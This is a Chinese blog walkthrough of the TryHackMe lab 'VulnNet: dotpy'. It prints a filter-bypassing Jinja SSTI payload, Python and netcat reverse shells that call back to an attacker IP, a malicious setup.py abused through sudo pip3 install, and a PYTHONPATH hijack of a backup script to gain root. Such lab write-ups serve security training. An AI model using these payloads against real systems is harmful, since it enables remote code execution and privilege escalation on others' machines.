TryHackMe-VulnNet_dotpy

最新推荐文章于 2023-10-18 22:00:00 发布
最新推荐文章于 2023-10-18 22:00:00 发布
阅读量989 收藏
点赞数 1
分类专栏: 我的网络安全之旅-TryHackMe 文章标签: python SSTI web安全 权限提升 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54704239/article/details/128716283
版权

VulnNet: dotpy

是的,VulnNet Entertainment又回来了,现在以安全为重点。您再次被要求执行渗透测试,包括 Web 安全评估和 Linux 安全审核。

难度:中等
网络语言:python
这台机器的设计更具挑战性,但没有太复杂的东西。Web 应用程序不仅要求您找到易受攻击的端点,还需要绕过其安全保护。您应该注意网站为您提供的输出。整个机器都是以Python为中心的。

注意:在浏览网页时,您可能会注意到域 vulnnet.com,但是,它不是实际的虚拟主机,您无需将其添加到主机列表中。

端口扫描

┌──(root🐦kali)-[/home/sugobet]
└─# nmap -sS 10.10.7.151 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-17 10:08 CST
Nmap scan report for 10.10.7.151
Host is up (0.33s latency).
Not shown: 999 closed tcp ports (reset)
PORT     STATE SERVICE
8080/tcp open  http-proxy

Web枚举

进web一看,又是登录页面,爆管理员用户名、sql注入均失败

不过有一个注册页面,注册一个账号并登录

后台是一个很眼熟但我又记不起来的系统

后台空到不能再空了,比白纸还要干净,妥妥的兔子洞

gobuster扫目录:

┌──(root🐦kali)-[/home/sugobet]
└─# gobuster dir --url http://10.10.7.151:8080/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt

又报错:

Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.7.151:8080/8ef97609-413e-43a5-b3b4-8b8a16ebc675 => 403 (Length: 3000). To continue please exclude the status code or the length

SSTI

当我在访问任意不存在的页面时,服务端返回结果:

  • http://10.10.7.151:8080/jhfffcvgv

    404

    SORRY!

    The page you’re looking for was not found.

    No results for jhfffcvgv
    Back to home

    © VulnNet Entertainment - Contact: hello@vulnnet.com

熟悉的页面,熟悉的回显,熟悉的No results for

其实在打开这道题之前我就已经猜到可能是ssti了,因为题目打上了web和python的tag,我一下子就联想到flask和django

poc:

http://10.10.7.151:8080/{{1 + 1}}

成功回显2

题目说了有安全防护

fuzzing出“. _”是被禁用的

试出报错,报错暴露了源码:

if "." in s or "_" in s or "[" in s or "]" in s:

使用attr利用python 16进制绕过

_ : \x5f
. : \x2e

我们使用python来reverse shell

python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.14.39.48",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

将payload转\x 16进制,这里可以使用cyberchef的to hex

\x70\x79\x74\x68\x6f\x6e\x33\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x6f\x73\x2c\x70\x74\x79\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x22\x31\x30\x2e\x31\x34\x2e\x33\x39\x2e\x34\x38\x22\x2c\x38\x38\x38\x38\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x74\x79\x2e\x73\x70\x61\x77\x6e\x28\x22\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x22\x29\x27

由于“_.”被禁用,所以只好使用attr来达到目的:

''.__class__.__base__.__subclasses__().__getitem__(401)

最终payload:

{{''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(401)|attr('<hex code>',shell=True,stdout=-1)|attr('communicate')()}}

成功getshell

web@vulnnet-dotpy:~/shuriken-dotpy$ id
id
uid=1001(web) gid=1001(web) groups=1001(web)

横向移动

sudo -l发现:

User web may run the following commands on vulnnet-dotpy:
    (system-adm) NOPASSWD: /usr/bin/pip3 install *


web@vulnnet-dotpy:/home$ cd /tmp
web@vulnnet-dotpy:/tmp$ mkdir ./hack
web@vulnnet-dotpy:/tmp$ echo "import os;os.system('mkfifo /tmp/f1;nc 10.14.39.48 9999 < /tmp/f1 | /bin/bash > /tmp/f1')" > ./hack/setup.py
web@vulnnet-dotpy:/tmp$ ls -la ./hack
total 12
drwxr-xr-x  2 web  web  4096 Jan 17 06:56 .
drwxrwxrwt 13 root root 4096 Jan 17 06:55 ..
-rw-r--r--  1 web  web    65 Jan 17 06:56 setup.py
web@vulnnet-dotpy:/tmp$ chmod 777 ./hack/setup.py

开启nc监听

执行pip:

web@vulnnet-dotpy:/tmp$ sudo -u system-adm /usr/bin/pip3 install ./hack

成功移动到system-adm

python3 -c "import pty;pty.spawn('/bin/bash')"
system-adm@vulnnet-dotpy:/tmp/pip-fc77uh7a-build$ id
id
uid=1000(system-adm) gid=1000(system-adm) groups=1000(system-adm),24(cdrom)

user.txt在system-adm的家目录下

权限提升

又是sudo -l

User system-adm may run the following commands on vulnnet-dotpy:
    (ALL) SETENV: NOPASSWD: /usr/bin/python3 /opt/backup.py

可以看到SETENV,已经猜到要做什么了

无权修改:

system-adm@vulnnet-dotpy:~$ ls -la /opt/backup.py
-rwxrwxr-- 1 root root 2125 Dec 21  2020 /opt/backup.py

读取该文件,第一时间我想到的就是篡改环境变量,但是我还是阅读了代码,看看代码有没有什么猫腻

嗯没看出来,该代码就是将/home/manage做一个zip备份到/var/backups

既然代码可能没啥东西,那么就试试环境变量

创建zipfile.py并写入以下内容:

system-adm@vulnnet-dotpy:~/hackkk$ echo "import os;os.setuid(0);os.system('/bin/bash -p')" > ./zipfile.py

执行:

sudo PYTHONPATH=/home/system-adm/hackkk /usr/bin/python3 /opt/backup.py

成功getroot

root.txt

root@vulnnet-dotpy:/home/system-adm/hackkk# id
uid=0(root) gid=0(root) groups=0(root)
root@vulnnet-dotpy:/home/system-adm/hackkk# cat /root/root.txt
Sugobet
关注
专栏目录
国内外安全网站网址大集合
weixin_34278190的博客
04-15 3564
国内安全 http://security.zz.ha.cn/ 起点安全,有相当不错的原创内容 国内安全 http://www.shopsky.com/ flashsky的个人主页 国内安全 http://www.safechina.net 有较多原创内容的安全站 国内安...
TryHackMe-Notes:TryHackMe Rooms笔记
04-02
【标题】:TryHackMe-Notes:TryHackMe Rooms笔记 在网络安全领域,TryHackMe是一个广受欢迎的在线平台,提供了各种网络安全课程和虚拟机(VMs),专注于渗透测试、网络安全学习以及道德黑客技能的提升。"TryHackMe ...
TryHackMe-Minotaur‘s_Labyrinth
M1n9K1n9的博客
01-16 1341
嗨,是我,代达罗斯,迷宫的创造者。我能够 实现一些后门,但牛头怪能够(部分)修复它们 (这是一个秘密,所以不要告诉任何人)。但是让我们回到你的任务,扎根这台机器,给牛头怪一个教训。
靶机渗透练习91-Grotesque:2
hirak0的博客
05-03 1075
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-2,673/ Description get flags difficulty: medium about vm: do not touch ram allocation. vm needs 4gb of ram. tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by em
黑客网站大全!都在这了!速看被删就没了
最新发布
Karka_的博客
10-18 1万+
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
国外网络安全&hacker网站
www.i201314.net
05-12 3441
http://lsd-pl.net/ LsD的站,最新最有效的exploit http://www.s0ftpj.org 提供一些水平很高的小工具 http://phrack.org/ Phrack的主页,经典的黑客技术电子杂志 http://www.w00w00.org/ w00w00组织的主页 http://mixter.void.ru/ Mixter的个人主页,不少有
tryhackme-writeups:可在TryHackMe.com上获得有关ROOMS的文章
03-09
TryHackMe撰写 是一个免费的在线平台,可通过您的浏览器使用动手练习和实验来学习网络安全! 客房 姓名 困难 简单 简单 简单 简单 中等的 简单 简单 简单 简单 中等的 中等的
thm-scripts:TryHackMe-Python脚本
04-19
THM-脚本 Python脚本可获取某些TryHackMe房间的标志。 要求 所有脚本均在Python v3.6上进行了测试。 用法 python3.6 script_name.py 执照
Tryhackme-Writeups:到目前为止,我的每个tryhackme房间的文字记录已完成
03-20
Tryhackme-Writeups 到目前为止,我的每个tryhackme房间的文字记录已完成 关于我:我自己Kartikey Jain,我是一名初学者Ethical Hacker,只是好奇事情如何破裂,我认为这现在成为我的激情,很高兴学习新概念。
tryhackme-ctf:TryHackMe CTF的编写,注释,dratfs,拼字游戏,文件和解决方案
05-06
注释,代码,PoC,解决方案,文章,涂鸦,草稿...。 (意大利前10名 :Italy: ) 使用的工具: 挖 ping 跟踪路线 exiftool 哈希猫 开膛手约翰 GTFObins 尼克托 哈希标识符 ... 敲门(端口敲门)
make
dingyun00196932的专栏
06-26 2755
Make ****    GNU的make工具自动识别一个大型项目中什么部分需要重新编译,而后调用对应的命令来对它们进行重新编译。     该版本的GNU make使用手册,最后更新于2002年7月8号,注解的是GNU make 3.80版本。     本手册描述了make的使用方法,包含如下章节: * Menu: * 目录: * Overview::
发现内网存活主机的各种姿势
hackzkaq的博客
04-28 980
零基础学黑客,搜索公众号:白帽子左一 在渗透中,当我们拿下一台服务器作为跳板机进一步进行内网渗透时,往往需要通过主机存活探测和端口扫描来收集内网资产。 本文主要是讲nmap的扫描和基于msf的扫描发现内网存活主机,每一个点都尽量详细介绍。 1.基于UDP的扫描 UDP简介:UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的 上一层。 UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报 文发送之后,是无法得知其是否安全完整到达的
十大hack工具
jasontome的android之路:Do it. Do it right. Do it righ
07-28 919
一、Nessus:这是一款UNIX平台的漏洞评估工具,可以说它是最好的、免费的网络漏洞扫描程序.其更新速度很快,有超过11000个插件.其关键特性包括安全和本地的安全检查,拥有GTK图形接口的客户端/服务器体系结构,还有一个嵌入式脚本语言(可以编写我们自己的插件或理解现有的插件).Nessus 3现在是闭源软件,不过仍是免费的,除非你需要最新的插件. 二、Wireshark:这是一款奇特的开
The status code returned from the server was:12030错误原因
yushuir的专栏
08-18 957
AJAX在运行时出现以下错误信息: An unknown error occured while processing the request on the server. The status code returned from the server was:12030 原因是用了中文的文件夹.改用英文文件夹就OK了...
Hack.Chat 在浏览器里快速建立简单、随用即丢线上聊天室,无须下载安装软体
freeking101的博客
04-23 7711
From:http://www.luoxiao123.cn/1554-6.html 有时候想跟其他使用者线上文字对话,但又不想把自己的联络资料(例如 Facebook 或即时通讯帐号)泄漏给对方,有些人可能会选择申请一个临时使用的帐号,但这未免也太麻烦!其实只要透过浏览器,即可开启临时、随用即丢的 线上聊天室,无须额外下载或安装任何软体。 一个名为Hack.chat的线上聊天室...
四少女火爆外网!ControlNet组合拳效果惊人,颠覆AI绘画游戏规则
量子位
02-22 436
金磊 发自 凹非寺量子位 | 公众号 QbitAI四位美少女,带着AI画画在ChatGPT的热浪中杀出了一片天地。新“魔法”一出,瞬间吸引全场目光:原本是一张四个闺蜜在沙滩边上的普通合影照:在新魔法的加持下,“啪的一下”画风两极反转,瞬间进入唯美动漫风:还有效果截然不同的,例如酱紫:不仅是动漫画风效果上的惊艳,就连人物的pose也是保持得“原汁原味”,美女们这下子算是分分钟实现了动漫自由。如此效果...
Building RESTful APIs with Tornado
行风
03-12 2151
from: http://www.drdobbs.com/open-source/building-restful-apis-with-tornado/240160382 The Tornado Web framework makes it easy to write RESTful APIs in Python. How easy? Have a look Tornado i
Puppeteer开发过程中遇到的问题及解决方案
莫幽悠
12-10 1万+
工欲善其事必先利其器,请先检查本机是否安装NodeJS环境以及查阅API: Google官方文档:https://developers.google.com/web/tools/puppeteer API(v12.0.1)文档:https://pptr.dev/#?product=Puppeteer&version=v12.0.1&show=outline 问题:如何处理各种验证码? 解决方案:建议大家去搜索对应的解决方案,Puppeteer并无此类解决方案。 问题:某些网站做
如何注册tryhackme
02-06
要注册TryHackMe,您需要执行以下步骤: 1. 打开TryHackMe的网站(https://tryhackme.com) 2. 点击网站的右上角的“注册”按钮 3. 在弹出的注册表单中输入您... 在完成这些步骤后,您就可以开始使用TryHackMe平台了。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sugobet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值